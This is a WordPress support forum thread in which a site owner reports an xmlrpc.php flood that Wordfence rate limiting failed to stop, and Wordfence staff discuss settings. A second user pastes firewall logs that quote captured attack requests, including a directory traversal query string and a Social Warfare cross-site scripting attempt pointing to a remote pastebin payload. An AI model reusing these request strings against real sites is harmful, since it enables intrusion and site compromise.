Brute Force Protection / Rate limit failed

  • We had an attack in a client’s website which is using Wordfence. The attacker was querying the xmplrpc.php multiple times. We’ve registered around 80k requests over a 10 hours period. So this could possibly be a DOS attack or a brute force attack.

    In Wordfence we have Brute Force Protection enabled with the default settings (lock out after 5 attempts and so on).

    Regarding the possible DOS attack. All the calls came from the same 2 IP addresses based in Russia. In Wordfence the rate limit option is enabled and set to throttle if anyone exceeds 30 requests per minute.

    The attacker long exceeded the limits set in Wordfence. Still, they were spawning hundreds of Apache processes, draining resources from the server and taking the website down for hours. The only solution that worked was to block the access to xmplrpc.php completely (via .htaccess). But this has the downside of disabling WordPress’ XML RPC service.

    Did anyone experienced that ? Does anyone from Wordfence team as some insight about it ?

Viewing 13 replies - 1 through 13 (of 13 total)

  • Hi @lsantana,

    Are you able to see the same 2 IP addresses attacking your website from Wordfence -> Tools -> Live Traffic?

    Dave

    Thread Starter Luciano Santana

    (@lsantana)

    Hi Dave !

    Thank you for the reply. No. It’s not there. We’ve identified the IPs by looking into Apache access logs

    Thread Starter Luciano Santana

    (@lsantana)

    By the way. The attack is still ongoing although the attacker is getting a 403 as response.

    Plugin Support wfscott

    (@wfscott)

    @lsantana

    Sorry for the delay.

    Can you give me an idea of what your lockout times are set to in the Brute Force and Rate Limiting areas? Hopefully we can prevent this from escalating in the future.

    It sounds like a DDoS mitigation would’ve been needed to full combat this issue

    Scott

    Thread Starter Luciano Santana

    (@lsantana)

    Hi Scott,

    Thanks for replying. Here are the settings
    for Brute Force and for Rate limiting

    Plugin Support wfscott

    (@wfscott)

    The brute force settings look good, however I would recommend upping the amount of time the attempts are counted over, maybe 30 minutes or an hour rather than 10 minutes.

    Your rate limiting settings look good overall. Have you experienced similar issues since the last instance the messages us about?

    Scott

    Thread Starter Luciano Santana

    (@lsantana)

    Hi Scott !

    As I’ve mentioned on the first message:

    The only solution that worked was to block the access to xmplrpc.php completely (via .htaccess).

    The attack kept going on for days and the attacker was just receiving a 403 after the solution was applied.

    I wouldn’t roll back that change until I’d have a confirmation this issue is solved via Wordfence. For this specific website, since it’s in production, stability is very important and we don’t really use any of the WordPress’ XML RPC service at the moment.

    Finally, regarding your comment:

    I would recommend upping the amount of time the attempts are counted over, maybe 30 minutes or an hour rather than 10 minutes.

    I’m not sure that would help. The attempts were occurring multiple times in a single minute. So a 10 minutes window should be more than enough to flag those IPs as attackers.

    I also facing the same issue tracked by Wordfence security
    Singapore attempted a failed login using an invalid username “Fahim”. https://www.domainname.com/xmlrpc.php
    9/4/2019 7:07:49 PM (1 day 18 hours ago)
    IP: xxx.xx.xxx.xxx Hostname: sg2plcpnl0061.prod.sin2.secureserver.net
    Human/Bot: Bot
    Browser: undefined
    Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1

    Also my following url also hitting from different ips

    Also the following urls from where the actual hit is coming from?

    1)https://www.mydomain.com/wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=https%3A%2F%2Fpastebin.com%…

    2) https://www.mydomain.com/xmlrpc.php

    3) https://www.mydomain.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=..%2Fdata%2Fadmin%2Fconfig_update.php

    4) https://www.mydomain.com/wp-login.php

    What is the reason for this?

    Thanks

    Please provide us a solution…

    Thread Starter Luciano Santana

    (@lsantana)

    @zotezo from the log you’ve shared it seems Wordfence is catching and preventing the attack. While the issue reported in this post is something that falls under Wordfence radar. I would recommend you to either search in the forum for a post that describes your exact issue or to open new post with better description of the issue you are experiencing.

    Hi,
    I have added Wordfence Security and it is showing this alert-
    Shanghai, China was blocked by firewall for Directory Traversal in query string: install_demo_name=..%2Fdata%2Fadmin%2Fconfig_update.php at https://www.mydomain.com/install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=..%2Fdata%2…
    9/6/2019 8:51:51 AM (6 hours 4 mins ago)
    IP: 222.186.174.90 Hostname: 222.186.174.90
    Human/Bot: Human
    Browser: Safari version 0.0 running on MacOSX
    Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50

    Activity Detail
    Oradea, Romania was blocked by the Wordfence Security Network at https://www.mydomain.com/wp-login.php
    9/6/2019 12:07:54 AM (14 hours 51 mins ago)
    IP: 89.35.39.60 Hostname: 89.35.39.60
    Human/Bot: Human
    Browser: Chrome version 56.0 running on Win7
    Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331

    Wayne, United States was blocked by firewall for Social Warfare <= 3.5.2 – Unauthenticated Stored Cross-Site Scripting in query string: swp_url=https%3A%2F%2Fpastebin.com%2Fraw%2FssNe5tqw at https://www.mydomain.com/wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=https%3A%2F%2Fpastebin.com%…
    9/5/2019 2:47:26 AM (1 day 12 hours ago)
    IP: 74.208.27.141 Hostname: 74.208.27.141
    Human/Bot: Human
    Browser: Firefox version 0.0 running on Win7
    Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0

    Is this anytype of Brute Force atack?

    Thanks,
    zotezo

    Thread Starter Luciano Santana

    (@lsantana)

    @zotezo as I said , by reading your logs I can see Wordfence is working as expected. Please, don’t hijack this post with an unrelated issue. If you need some specific support open a thread of your own.

    Short answer is : yes you are being attacked but Wordfence is doing it’s job in your case.

    Thanks for your clarification..

Viewing 13 replies - 1 through 13 (of 13 total)
  • The topic ‘Brute Force Protection / Rate limit failed’ is closed to new replies.